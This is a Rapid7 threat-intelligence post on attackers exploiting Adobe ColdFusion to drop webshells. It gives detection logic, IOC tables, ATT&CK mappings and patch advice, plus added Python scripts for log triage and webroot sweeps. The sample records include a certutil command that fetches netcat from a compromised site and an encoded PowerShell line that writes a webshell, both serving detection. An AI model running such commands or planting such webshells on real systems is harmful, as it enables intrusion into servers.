Rapid7 Observed Exploitation of Adobe ColdFusion | Rapid7 Blog

Last updated at Tue, 27 Feb 2024 17:17:29 GMT

Note: While Rapid7 did not definitively tie the attacker behavior in this blog to a specific CVE at time of publication, as of December 2023 we have observed multiple instances of exploitation of Adobe ColdFusion CVE-2023-26360 for initial access, as well as exploitation of ColdFusion CVE-2023-29300, CVE-2023-29298, and CVE-2023-38203.

Rapid7’s Threat Intelligence and Detection Engineering team has identified active exploitation of Adobe ColdFusion in multiple customer environments. The observed activity dates back to January 2023. IOCs are included below.

Rapid7 has existing detection rules within InsightIDR that identified this activity, and has created additional rules based on the observed behavior. We have also observed the compromised website, ooshirts[.]com, being used in other attacks dating back to March 2022.

Attacker Behavior

The earliest time frame of compromise identified thus far occurred in early January 2023. Rapid7 discovered evidence indicating that a malicious actor dropped webshells using an encoded PowerShell command. Process start data indicates that ColdFusion 2018 is spawning malicious commands.

Example base64 encoded command executed by malicious actor through ColdFusion:

Decoded:

Rapid7 Customers

In our current investigations, previously existing and new detections have been observed triggering post-exploitation across Rapid7 InsightIDR and Managed Detection & Response (MDR) customers:

Webshell – Possible ColdFusion Webshell In Command Line

This detection identifies common ColdFusion tags being passed in the command line. This technique is used by malicious actors when redirecting strings into files when creating webshells.

Attacker Technique – CertUtil With URLCache Flag

This detection identifies the use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it. This technique is used by malicious actors to retrieve files hosted on a remote web server and write them to disk.
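
The two detections above, together with the encoded-PowerShell behaviour described under Attacker Behavior, can be reproduced as a small triage script over process-start records. The following is an added example written for this page, not Rapid7's InsightIDR rule logic. It assumes a simple pipe-delimited record format (timestamp|parent_image|image|command_line), assumes the ColdFusion 2018 service shows up as coldfusion.exe or java.exe in that telemetry (adjust to what your EDR records), and runs over constructed sample records rather than real incident data; the webshell bodies in those samples are deliberately elided with "...".

```python
"""Triage of process-start records for the ColdFusion post-exploitation behaviour
described above. Added example; sample records are constructed, not Rapid7 telemetry."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed image names of the ColdFusion 2018 server process on Windows.
COLDFUSION_PARENTS = {"coldfusion.exe", "java.exe"}
# Interpreters/utilities ColdFusion should not normally spawn (assumption).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}

RULE_CHILD = "Abnormal child process of ColdFusion Server"
RULE_CF_TAG = "Webshell - Possible ColdFusion Webshell In Command Line"
RULE_CERTUTIL = "Attacker Technique - CertUtil With URLCache Flag"
RULE_ENCODED = "Encoded PowerShell command (decoded for review)"

# ColdFusion tags have no business in a command line: <cfexecute>, </cfexecute>, ...
CF_TAG_RE = re.compile(r"<\s*/?\s*cf(?:execute|file|script|output)\b", re.IGNORECASE)
CERTUTIL_URLCACHE_RE = re.compile(r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b", re.IGNORECASE)
# powershell.exe accepts abbreviations of -EncodedCommand (-e, -ec, -enc).
PS_ENCODED_RE = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    command_line: str
    decoded: Optional[str] = None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE; return '' if not decodable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_line(line: str) -> List[Finding]:
    """Apply every rule to one 'timestamp|parent_image|image|command_line' record."""
    _ts, parent, image, cmdline = line.split("|", 3)
    parent, image = parent.lower(), image.lower()
    findings: List[Finding] = []

    if parent in COLDFUSION_PARENTS and image in SUSPICIOUS_CHILDREN:
        findings.append(Finding(RULE_CHILD, cmdline))

    decoded = ""
    if image in {"powershell.exe", "pwsh.exe"}:
        m = PS_ENCODED_RE.search(cmdline)
        if m:
            decoded = decode_encoded_command(m.group(1))
            if decoded:
                findings.append(Finding(RULE_ENCODED, cmdline, decoded))

    # Scan both the raw command line and any decoded payload for ColdFusion tags,
    # so a webshell written via an encoded PowerShell command is still caught.
    if CF_TAG_RE.search(cmdline + "\n" + decoded):
        findings.append(Finding(RULE_CF_TAG, cmdline, decoded or None))

    if CERTUTIL_URLCACHE_RE.search(cmdline):
        findings.append(Finding(RULE_CERTUTIL, cmdline))
    return findings


def triage(lines) -> List[Finding]:
    return [f for line in lines if line.strip() for f in triage_line(line)]


# Constructed sample records (not from any real incident). The encoded payload is built
# here so that it decodes cleanly; the webshell body is elided with "..." on purpose.
WEBROOT = r"C:\ColdFusion2018\cfusion\wwwroot"
_ENC_PAYLOAD = base64.b64encode(
    f'Set-Content -Path "{WEBROOT}\\wow1.cfm" -Value "<cfexecute ...></cfexecute>"'.encode("utf-16-le")
).decode()
SAMPLE_LOG = [
    f"2023-01-05T03:12:44Z|coldfusion.exe|cmd.exe|cmd.exe /c echo ^<cfexecute ...^>^</cfexecute^> > {WEBROOT}\\www.cfm",
    f"2023-01-05T03:13:01Z|coldfusion.exe|powershell.exe|powershell.exe -nop -w hidden -enc {_ENC_PAYLOAD}",
    r"2023-01-05T03:14:20Z|cmd.exe|certutil.exe|certutil.exe -urlcache -split -f hXXps://www.ooshirts[.]com/images/nc.exe C:\Windows\Temp\nc.exe",
    r"2023-01-05T03:20:00Z|services.exe|certutil.exe|certutil.exe -verify -urlfetch C:\certs\server.cer",  # benign certutil use
    r"2023-01-05T08:00:00Z|explorer.exe|cmd.exe|cmd.exe /c dir C:\inetpub",  # benign shell
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.rule}] {f.command_line[:80]}")
        if f.decoded:
            print(f"    decoded: {f.decoded}")
```

Over the constructed records the script raises six findings: the two ColdFusion-spawned shells, the tag rule on both the raw echo-redirect and the decoded PowerShell payload, the decoded payload itself, and the certutil -urlcache download; the benign certutil -verify and dir records raise nothing.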

Indicators of Compromise

Malicious actors have been observed redirecting strings into files to create webshells. Look for *.cfm files in ColdFusion webroots containing the following ColdFusion tags:

  • <cfexecute>
  • </cfexecute>

Review process start logs for any abnormal child processes of ColdFusion Server.

File items:

Type     | Value                                                            | Notes
Filename | WOW.TXT                                                          | ColdFusion WebShell
Filename | wow.txt                                                          | ColdFusion WebShell
Filename | www.txt                                                          | ColdFusion WebShell
Filename | www.cfm                                                          | ColdFusion WebShell
Filename | wow1.cfm                                                         | ColdFusion WebShell
Filename | zzz.txt                                                          | ColdFusion WebShell
Filename | dncat.exe                                                        | DotNetCat
Filename | nc.exe                                                           | NetCat
SHA-256  | e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245 | ColdFusion WebShell
SHA-256  | 2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25 | ColdFusion WebShell
SHA-256  | 03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3 | ColdFusion WebShell
SHA-256  | be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148 | ColdFusion WebShell
MD5      | 1edf1d653deb9001565b5eff3e50824a                                 | DotNetCat
SHA-1    | 5d95fb365b9d0ceb568bb0c75cb1d70707723f27                         | DotNetCat
SHA-256  | 213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0 | DotNetCat
MD5      | 470797a25a6b21d0a46f82968fd6a184                                 | NetCat
SHA-1    | dac7867ee642a65262e153147552befb0b45b036                         | NetCat
SHA-256  | ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419 | NetCat
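
A sweep of a ColdFusion webroot against the file indicators listed above, as an added example written for this page (not Rapid7's tooling). It flags files by the listed names (case-insensitively, since both WOW.TXT and wow.txt were seen), by MD5/SHA-1/SHA-256 match against the table, and by the presence of a <cfexecute> tag in any file regardless of extension, because the staged copies above were named *.txt. The webroot it scans is a constructed temporary directory with placeholder contents, so only the filename and tag checks fire there; the hash lookup is exercised directly with a digest from the table.

```python
"""Hunt a ColdFusion webroot for the file indicators in the table above.
Added example; the webroot scanned here is a constructed temp directory."""
import hashlib
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Indicators copied from the file table above.
IOC_FILENAMES = {"wow.txt", "www.txt", "www.cfm", "wow1.cfm", "zzz.txt", "dncat.exe", "nc.exe"}
IOC_HASHES = {
    "sha256": {
        "e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245",
        "2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25",
        "03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3",
        "be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148",
        "213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0",
        "ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419",
    },
    "sha1": {"5d95fb365b9d0ceb568bb0c75cb1d70707723f27", "dac7867ee642a65262e153147552befb0b45b036"},
    "md5": {"1edf1d653deb9001565b5eff3e50824a", "470797a25a6b21d0a46f82968fd6a184"},
}
# <cfexecute> or </cfexecute> in any letter case.
CFEXECUTE_RE = re.compile(rb"<\s*/?\s*cfexecute\b", re.IGNORECASE)
CHUNK = 1 << 20


def hash_file(path: str) -> Dict[str, str]:
    """MD5, SHA-1 and SHA-256 of one file in a single pass, as lowercase hex."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            for d in digests.values():
                d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def match_hashes(digests: Dict[str, str]) -> List[str]:
    """Names of the algorithms whose digest is a known indicator."""
    return [alg for alg, value in digests.items() if value.lower() in IOC_HASHES.get(alg, set())]


def scan_webroot(root: str) -> List[dict]:
    """Walk the webroot and report each file with every reason it matched."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = []
            if name.lower() in IOC_FILENAMES:
                reasons.append("filename-ioc")
            for alg in match_hashes(hash_file(full)):
                reasons.append(f"hash-ioc:{alg}")
            with open(full, "rb") as fh:
                if CFEXECUTE_RE.search(fh.read()):
                    reasons.append("cfexecute-tag")
            if reasons:
                hits.append({"path": Path(full).relative_to(root).as_posix(), "reasons": reasons})
    return sorted(hits, key=lambda h: h["path"])


def build_sample_webroot() -> str:
    """Constructed sample tree: a benign page, a staged webshell, and a renamed copy.
    Webshell bodies are elided with '...' on purpose."""
    root = tempfile.mkdtemp(prefix="cf_webroot_")
    samples = {
        "index.cfm": b"<cfoutput>#now()#</cfoutput>\n",
        "images/wow1.cfm": b"<cfexecute ...></cfexecute>\n",
        "images/logo.txt": b"<CFEXECUTE ...>\n",      # mixed case, .txt extension
        "uploads/readme.txt": b"nothing to see here\n",
    }
    for rel, body in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
    return root


if __name__ == "__main__":
    for hit in scan_webroot(build_sample_webroot()):
        print(hit["path"], "->", ", ".join(hit["reasons"]))
```

The tag check reads each file in full after hashing it; on a large webroot with many uploads, restrict the tag check to text-like files or size-cap the read, but keep hashing everything so renamed binaries such as nc.exe are still caught by digest.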

Network-based indicators:

Type | Value                                         | Notes
FQDN | www.av-iq[.]com                               | Legitimate Compromised Domain
FQDN | www.ooshirts[.]com                            | Legitimate Compromised Domain
URL  | hXXps://www.av-iq[.]com/wow.txt               | ColdFusion WebShell
URL  | hXXps://www.ooshirts[.]com/images/zzz.txt     | ColdFusion WebShell
URL  | hXXps://www.ooshirts[.]com/images/dncat.exe   | DotNetCat
URL  | hXXp://www.ooshirts[.]com/images/nc.exe       | NetCat

MITRE ATT&CK Tactic/Technique/Subtechniques

TA0042 Resource Development (tactic):

  • T1584 Compromise Infrastructure (technique)
  • T1584.004 Server (sub-technique)

TA0001 Initial Access (tactic):

  • T1190 Exploit Public Facing Application (technique)

TA0002 Execution (tactic):

  • T1059 Command and Scripting Interpreter (technique)
  • T1059.001 PowerShell (sub-technique)
  • T1059.003 Windows Command Shell (sub-technique)

TA0003 Persistence (tactic):

  • T1505 Server Software Component (technique)
  • T1505.003 Web Shell (sub-technique)

TA0011 Command & Control (tactic):

  • T1132 Data Encoding (technique)
  • T1132.001 Standard Encoding (sub-technique)
  • T1572 Protocol Tunneling (technique)

Mitigation Guidance

While we have not tied this behavior back to exploitation of a specific CVE, Adobe released patches for known vulnerabilities in ColdFusion on March 14, 2023. At least one of the CVEs patched in version 16 (ColdFusion 2018) and version 6 (ColdFusion 2021) is known to be exploited in the wild. Rapid7’s vulnerability research team has successfully chained CVE-2023-26359 and CVE-2023-26360 for unauthenticated remote code execution; in-depth analysis and proof-of-concept code is available in AttackerKB here.

We strongly advise ColdFusion customers to update to the latest version to remediate known risk, regardless of whether the behavior we have detailed in this blog is related to recent vulnerabilities. We also advise customers to examine their environments for signs of compromise.

InsightVM and Nexpose customers are able to assess their exposure to known Adobe ColdFusion vulnerabilities via recurring vulnerability check coverage.

Eoin Miller contributed to this article.

Source: https://www.rapid7.com/blog/post/2023/03/21/etr-rapid7-observed-exploitation-of-adobe-coldfusion/